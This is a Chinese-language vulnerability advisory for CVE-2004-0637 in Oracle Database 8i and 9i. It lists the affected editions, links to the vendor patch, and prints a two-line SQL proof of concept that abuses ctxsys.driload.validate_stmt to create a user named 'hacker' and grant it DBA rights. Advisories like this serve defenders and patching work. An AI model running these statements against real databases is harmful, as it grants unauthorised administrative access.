安全研究
安全漏洞
Oracle Database Server ctxsys.driload访问验证漏洞
发布日期:2004-09-03
更新日期:2009-07-12
受影响系统:Oracle database server Oracle Oracle9i Standard Editi
Oracle database server Oracle Oracle9i Standard Editi
Oracle database server Oracle Oracle9i Personal Editi
Oracle database server Oracle Oracle9i Enterprise Edi
Oracle database server Oracle Oracle8i Standard Editi
Oracle database server Oracle Oracle8i Enterprise Edi
描述:
BUGTRAQ ID:
11099
CVE(CAN) ID:
CVE-2004-0637
Oracle Database Server是一个对象一关系数据库管理系统。它提供开放的、全面的、和集成的信息管理方法。
Oracle Database Server 8.1.7.4-9.2.0.4存在访问验证漏洞,允许未授权的用户通过ctxsys.driload软件包以DBA权限执行任意命令。
<*来源:Alexander Kornbrust (
ak@red-database-security.com)
链接:
http://secunia.com/advisories/12409/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
SQL&gt; exec ctxsys.driload.validate_stmt
('create user hacker identified by hacker');
SQL&gt; exec ctxsys.driload.validate_stmt('grant dba, connect to hacker');
建议:
厂商补丁:
Oracle
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.oracle.com/technetwork/topics/security/
http://otn.oracle.com/deploy/security/pdf/2004alert68.pdf浏览次数:1905
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障 |
